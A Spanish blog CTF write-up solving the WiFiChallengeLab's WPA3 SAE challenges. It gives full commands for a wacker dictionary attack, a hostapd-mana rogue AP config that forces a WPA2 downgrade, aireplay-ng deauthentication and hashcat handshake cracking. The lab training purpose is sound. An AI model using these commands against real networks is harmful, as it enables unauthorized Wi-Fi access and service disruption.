Wi-Fi desde 0 – SAE

Wi-Fi

3,2,1 … Empezamos!

Nueva entrada en el blog en la cual vamos a resolver el primer apartado del CTF WiFiChallengeLab creado por Raúl Calvo Laorden, que corresponde a “SAE”. Una red WPA3 SAE (Autenticación Simultánea de Iguales) es un protocolo de seguridad que mejora la protección contra ataques de fuerza bruta. Utiliza un método de autenticación más seguro que el WPA2, ofreciendo una mejor protección individualizada y un cifrado más fuerte para los usuarios de redes Wi-Fi. Una de las ventajas de este tipo de seguridad es que, incluso cuando los usuarios eligen contraseñas que no cumplen con las recomendaciones típicas de complejidad, el sistema provee un handshake seguro, que resiste los ataques por diccionario.

Se recomienda leer estos artículos antes de continuar con la lectura:

¡Espero que os resulte útil!

Retos SAE

En cada challenge tenéis la descripción y pistas para resolverlo en caso de ser necesario.

13. ¿Cuál es la contraseña de wifi-management?

(13. What is the wifi-management password?)

En este primer challenge vamos a emplear un ataque de fuerza bruta para descubrir la contraseña de wifi-management, debido a que en las redes WPA3 se sigue permitiendo realizar este tipos de ataques para la obtención de la contraseña.

Para ello, vamos a emplear la herramienta wackerWacker es una herramienta que está compuesta por un conjunto de scripts que ayuda a realizar un ataque de diccionario contra un punto de acceso WPA3.

El comando que vamos a emplear es el siguiente:

sudo su
cd /root/tools/wacker/
./wacker.py --wordlist /root/rockyou-top100000.txt --ssid wifi-management --bssid F0:9F:C2:11:0A:24 --interface wlan0 --freq 2462

A continuación, vamos a explicar que es cada parámetro:

  • ./wacker.py : Este es el script principal que se está ejecutando.
  • --wordlist : Listado de palabras para usar en el ataque de diccionario.
  • --ssid : Se especifica el SSID (nombre) del punto de acceso al que se va a atacar.
  • --bssid : Se especifica la dirección BSSID del punto de acceso al que se va a atacar.
  • --interface : Se indica la interfaz de red a usar en el ataque.
  • --freq : Se especifica la frecuencia del canal Wi-Fi del punto de acceso a atacar.
Wacker
flag 13

14. ¿Cuál es la contraseña de wifi-IT?

(14. What is the wifi-IT password?)

Si un cliente está configurado para WPA2/WPA3 en una red que utiliza WPA3 SAE, es posible forzar un downgrade en el cliente para que se conecte a nuestro RogueAP con WPA2. De esta forma, podemos obtener el handshake y posteriormente crackearlo, tal como se hace en el challenge 11.

Podremos observar que emplea SAE y PSK en el fichero .csv que genera airodump-ng, lo cual indica que los clientes también aceptan PSK.

En primer lugar, cómo en anteriores retos, pararemos el servicio de NetworkManager que detendrá los procesos que podrían interferir con la suite de herramientas aircrack-ng e iniciamos la interfaz wlan0.

sudo airmon-ng check kill
sudo airmon-ng start wlan0
Modo monitor wlan0

Si lanzamos un airodump-ng, podemos ver que utiliza SAE.

sudo airodump-ng --essid wifi-IT --band abg wlan0mon
Airodump-ng de la red wifi-IT

Analizando el fichero generado ‘captura06-01.csv‘ en el challenge 06, podemos ver que la red wifi-IT admite tanto SAE como PSK, por lo que podemos realizar un downgrade a la red.

cat capturas/captura06-01.csv
Análisis captura de tráfico de wifi-IT

Al igual que hemos hecho anteriormente, montamos el RogueAP con hostapd-mana.

pico wifi-it.confcat wifi-it.conf

interface=wlan1
driver=nl80211
hw_mode=g
channel=11
ssid=wifi-IT
mana_wpaout=wifi-it.hccapx
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=12345678
Fichero wifi-it.conf

Desplegamos el RogueAP con el siguiente comando:

sudo hostapd-mana wifi-it.conf

Para “forzar” que los usuarios se conecten a nuestro punto, realizamos una de-autenticación, al igual que en el challenge 07.

En primer lugar, indicamos que la interfaz wlan0mon esté en el canal 11 y posteriormente, lanzamos el ataque.

sudo iwconfig wlan0mon channel 11
sudo aireplay-ng wlan0mon -0 0 -a F0:9F:C2:1A:CA:25
De-autenticación sobre wifi-IT

Una vez realizado la de-autenticación, podemos crackear el fichero generado wifi-it.hccapx.

sudo hashcat -a 0 -m 2500 wifi-it.hccapx /root/rockyou-top100000.txt --force
hashcat
flag 14

De esta forma, obtener la contraseña del AP wifi-IT.

Hasta aquí los 2 retos del apartado SAE.

flags SAE

¡Nos vemos en el próximo! 😊

🚀 ¿Quieres especializarte en auditorías WiFi?

Si este artículo te ha resultado útil y quieres dar el siguiente paso, el CWP es uno de los cursos que recomiendo para aprender auditorías WiFi de forma práctica y estructurada.

✅ Laboratorios prácticos
✅ Metodología profesional
✅ Certificación incluida
✅ Ideal para pentesters y auditores

Versión Español

Versión Inglés

Enlace de afiliado, al comprar desde este enlace apoyas el contenido de Cyber0asis sin coste adicional para ti 🤗

Referencias

Contacta con nosotros

Información básica sobre el tratamiento de datos personales:

Responsable: Carolina Gómez Uriarte.
Finalidad: Responder a tu comentario, duda, solicitud de información o presupuesto.
Legitimación: Interés legítimo en atender tu petición y, cuando proceda, aplicación de medidas precontractuales.
Derechos: acceso, rectificación, supresión, limitación del tratamiento, oposición, portabilidad, a no ser objeto de decisiones individuales automatizadas sin tu consentimiento y a presentar una reclamación ante una autoridad de control.
Información adicional: En la Política de Privacidad, encontrarás información adicional sobre la recopilación y el uso de tu información personal, así como de los derechos que tienes en relación con dichos datos.